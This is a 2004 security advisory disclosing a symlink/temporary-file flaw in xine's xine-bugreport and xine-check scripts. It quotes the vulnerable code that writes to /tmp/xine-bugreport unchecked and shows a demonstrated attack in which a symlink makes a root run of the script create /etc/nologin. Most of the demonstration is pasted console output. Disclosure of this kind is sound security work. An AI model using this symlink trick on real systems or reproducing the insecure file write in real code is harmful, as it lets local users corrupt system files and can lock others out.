~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~* Product: xine-bugreport/xine-check scripts. http://xinehq.de/ Versions: xine-bugreport && xine-check (they are the same script, but 2 copies exist in a system with different names) Bug: Symlink bug / tmpfile bug. Impact: Attacker's can write to arbitrary files, corrupt sensitive system files, and in theory elevate privileges (unlikely). Risk: Low/Medium Date: March 19, 2004 Author: Shaun Colley Email: shaunige yahoo co uk WWW: http://www.nettwerked.co.uk ~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~* Introduction ############# "xine is a free multimedia player. It plays back CDs, DVDs, and VCDs. It also decodes multimedia files like AVI, MOV, WMV, and MP3 from local disk drives, and displays multimedia streamed over the Internet. It interprets many of the most common multimedia formats available - and some of the most uncommon formats, too." - extracted from , xine project site. Due to the ongoing, and sometimes experimental addition of features added to xine, a script (*there is two copies of the script: /usr/bin/xine-bugreport and /usr/bin/xine-check - they are *exactly* the same*) is included in xine distributions to allow a user to possibly remedy a problem, or report a bug if their problem could not be solved. However, in the bug-reporting code, the bug report email is dumped to a file in the /tmp directory for a user to use later or send manually - this file is written in a insecure manner, presenting a symlink vulnerability. Details ######## In the section of the xine-bugreport/xine-check script which assembles a bug report email, a symlink vulnerability exists due to an insecure file write of the finished bug report email template. This may allow an attacker to write to/corrupt sensitive system files, and in theory elevate privileges, although unlikely. The bug occurs in the following code fragment: --- xine-bugreport / xine-check frag --- [...] bugreport=/tmp/xine-bugreport [...] add "" add "additional description:" add "----------------------" add "" add "PUT YOUR DESCRIPTION HERE" add "(please replace these two lines by your complete problem description)" add "" add "" add "system info, as found by xine-check:" add "-----------------------------------" cat "$logfile" >>$bugreport # no file check performed [...] --- EOF As can be seen, no file checks take place before the script (xine-check/xine-bugreport) 'cats' the bug report template into the file defined in the $bugreport variable, /tmp/xine-bugreport. The xine-check/xine-bugreport script has the following structure: - Check xine-related configuration - Suggest hints to fix any problems which might occur - Ask the user if the hints fixed the problem - If it did not, ask the user what type of problem they are having - If the user chooses the "something else" option (option 8), the bug report section of the script starts. - this is one place where the vulnerability exists. - Also, if other options were picked as the type of problem, choosing various things will allow a user to report the problem as a bug. Due to this insecure method of handling files, a symlink bug presents itself, allowing an attacker to write to/corrupt files with the permissions of the invoking user of the xine-bugreport/xine-check script. Exploitation is trivial. Details are presented below. Exploitation ############# Below is an example exploitation scenario which I actually carried out on my system. --- attack --- [shaun@localhost shaun]$ ls -al /etc/nologin ls: /etc/nologin: No such file or directory [shaun@localhost shaun]$ ln -s /etc/nologin /tmp/xine-bugreport [...] [root@localhost bin]# xine-bugreport Please be patient, this script may take a while to run... logging to /tmp/xine-check.log... [OUCH!!] You're running me with root permissions? You should definitely run xine as normal user, not root. Running it as root will expose you to some severe security issues. This script should run as the same user that you would use to run xine. If you run me as root (as you currently are), I cannot check if your real-life user has sufficient permissions... Unless you want to recheck something with root permissions, you should abort me now (press Ctrl-C) and run me from your usual account. press to continue... [ good ] you're using Linux, doing specific tests [ good ] looks like you have a /proc filesystem mounted. [ good ] You seem to have a reasonable kernel version (2.4.19-16mdk) [ good ] intel compatible processor, checking MTRR support [ good ] you have MTRR support and there are some ranges set. [ good ] found the player at /usr/bin/xine [ good ] /usr/bin/xine is in your PATH [ hint ] No xine-config found. Assuming xine from RPMs The xine-config script can be used to deternime some file locations used by xine-lib, but you don't have such a script on your system. However, it looks like you installed xine from the RedHat packages. So I'll just guess that you are using the standard locations. If you want me to be sure about those file locations, you can install the 'xine-lib-devel' package (or 'xine-devel', depend on what packages you're using, which contains xine-config. However, this package is not really needed to run xine... press to continue... [ good ] plugin directory /usr/lib/xine/plugins exists. [ good ] found input plugins [ good ] found demux plugins [ good ] found decoder plugins [ good ] found video_out plugins [ good ] found audio_out plugins [ good ] skin directory /usr/share/xine/skins exists. [ good ] found logo in /usr/share/xine/skins [ good ] I even found some skins. [ good ] /dev/cdrom points to /dev/cdroms/../ide/host0/bus1/target1/lun0/cd [ hint ] /dev/dvd is /dev/dvd, not a DVD device /dev/dvd is the default device that xine uses for playing DVDs. You could make your life easier by creating a symlink named /dev/dvd pointing to your DVD device (something like /dev/scd0 or /dev/hdc). If your DVD-ROM device is /dev/hdb (slave ATAPI device on primary bus), rm /dev/dvd ln -s hdb /dev/dvd typed as root will give you the symlink. Alternatively, you can configure xine to use the real device directly, using the setup dialog within xine, but I can't check your DMA settings in that case... press to continue... [ good ] found xvinfo: X-Video Extension version 2.2 [ hint ] Your X server doesn't support YUV overlays. That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive. Maybe upgrading your X server will help here. If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/ press to continue... [ hint ] Your X server doesn't support packed YUV overlays. That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive. Maybe upgrading your X server will help here. If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/ press to continue... [ hint ] Your X server doesn't have any XVideo support... XVideo is an X server extension introduced by XFree86 4.x. This extension provides access to hardware accelerated color space conversion and scaling, which gives a great performance boost. If you have a fast (>1GHz) machine, you may be able to watch all kinds of video, anyway. You will waste lots of CPU cycles, though... press to continue... Could you solve your xine problems using the previous hints? (y/n)? 'pardon?? neither yes nor no? assuming no... What kind of trouble does xine cause for you? 1) plays audio, but no video 2) plays video, but no audio 3) audio is interrupted and/or crackling 4) audio and video are out of sync 5) can't play DVDs 6) xine hangs instead of playing anything 7) xine doesn't start 8) something else [root@localhost bin]# xine-bugreport Please be patient, this script may take a while to run... logging to /tmp/xine-check.log... [OUCH!!] You're running me with root permissions? You should definitely run xine as normal user, not root. Running it as root will expose you to some severe security issues. This script should run as the same user that you would use to run xine. If you run me as root (as you currently are), I cannot check if your real-life user has sufficient permissions... Unless you want to recheck something with root permissions, you should abort me now (press Ctrl-C) and run me from your usual account. press to continue... [ good ] you're using Linux, doing specific tests [ good ] looks like you have a /proc filesystem mounted. [ good ] You seem to have a reasonable kernel version (2.4.19-16mdk) [ good ] intel compatible processor, checking MTRR support [ good ] you have MTRR support and there are some ranges set. [ good ] found the player at /usr/bin/xine [ good ] /usr/bin/xine is in your PATH [ hint ] No xine-config found. Assuming xine from RPMs The xine-config script can be used to deternime some file locations used by xine-lib, but you don't have such a script on your system. However, it looks like you installed xine from the RedHat packages. So I'll just guess that you are using the standard locations. If you want me to be sure about those file locations, you can install the 'xine-lib-devel' package (or 'xine-devel', depend on what packages you're using, which contains xine-config. However, this package is not really needed to run xine... press to continue... [ good ] plugin directory /usr/lib/xine/plugins exists. [ good ] found input plugins [ good ] found demux plugins [ good ] found decoder plugins [ good ] found video_out plugins [ good ] found audio_out plugins [ good ] skin directory /usr/share/xine/skins exists. [ good ] found logo in /usr/share/xine/skins [ good ] I even found some skins. [ good ] /dev/cdrom points to /dev/cdroms/../ide/host0/bus1/target1/lun0/cd [ hint ] /dev/dvd is /dev/dvd, not a DVD device /dev/dvd is the default device that xine uses for playing DVDs. You could make your life easier by creating a symlink named /dev/dvd pointing to your DVD device (something like /dev/scd0 or /dev/hdc). If your DVD-ROM device is /dev/hdb (slave ATAPI device on primary bus), rm /dev/dvd ln -s hdb /dev/dvd typed as root will give you the symlink. Alternatively, you can configure xine to use the real device directly, using the setup dialog within xine, but I can't check your DMA settings in that case... press to continue... [ good ] found xvinfo: X-Video Extension version 2.2 [ hint ] Your X server doesn't support YUV overlays. That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive. Maybe upgrading your X server will help here. If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/ press to continue... [ hint ] Your X server doesn't support packed YUV overlays. That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive. Maybe upgrading your X server will help here. If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/ press to continue... [ hint ] Your X server doesn't have any XVideo support... XVideo is an X server extension introduced by XFree86 4.x. This extension provides access to hardware accelerated color space conversion and scaling, which gives a great performance boost. If you have a fast (>1GHz) machine, you may be able to watch all kinds of video, anyway. You will waste lots of CPU cycles, though... press to continue... Could you solve your xine problems using the previous hints? (y/n)? n What kind of trouble does xine cause for you? 1) plays audio, but no video 2) plays video, but no audio 3) audio is interrupted and/or crackling 4) audio and video are out of sync 5) can't play DVDs 6) xine hangs instead of playing anything 7) xine doesn't start 8) something else please select (1..8): 8 please describe your xine problem briefly in _one_ line ( < 65 characters): hello world You should include a _complete_ copy of xine's output in your bug report. Note, however, that there is a 40K limit on messages sent to the mailing list, So you should strip down the parts that repeat over and over, if there are any. You can either copy&paste this output from the terminal where you ran xine, or you can collect xine's output in a file named /tmp/xine.out, using this command: xine >/tmp/xine.out 2>&1 (assuming you have a Bourne compatible shell, like bash, for example) If you need to add any parameters, you can do so... This method is useful if you want to remove part of the output... Which method would you prefer? 1) copy&paste 2) logfile /tmp/xine.out please select (1..2): 2 please press when you have the log ready in /tmp/xine.out Hmmm, I could not read the /tmp/xine.out file. Skipping this step. You may add the output later, if this wasn't your intention... press to continue... Okay. That's all I could guide you through... I have assembled a skeleton for your bugreport in the file /tmp/xine-bugreport You're strongly encouraged to add a detailed description of your problem. Just look for 'additional description', and fill it in... When you're finished, you can use your favourite mailer to send it to . Please use this subject line, or something similar: Subject: bug: hello world Alternatively, I could try to send the bug report for you, using /bin/mail -s "bug: hello world" Please make sure to add the additional description before saying "yes"! Do you want me to do this now? (y/n)? n Thanks for your bugreport! Have a nice day! [...] [shaun@localhost shaun]$ ls -al /etc/nologin -rw-r--r-- 1 root root 1756 Mar 20 21:56 /etc/nologin [shaun@localhost shaun]$ --- Summary ######## The vulnerability can *ONLY* be exploited when the user enters the part of the xine-check/xine-bugreport script which allows them to send a bug report to Xine developers. This is the part of the script in which the insecure file handling is performed - thus manifesting the symlink bug. While it may be unlikely that these conditions occur, the results can be fairly severe, as demonstrated above. Credit ####### This issue was discovered by shaun2k2 / Shaun Colley - . ___________________________________________________________ Yahoo! Messenger - Communicate instantly..."Ping" your friends today! Download Messenger Now http://uk.messenger.yahoo.com/download/index.html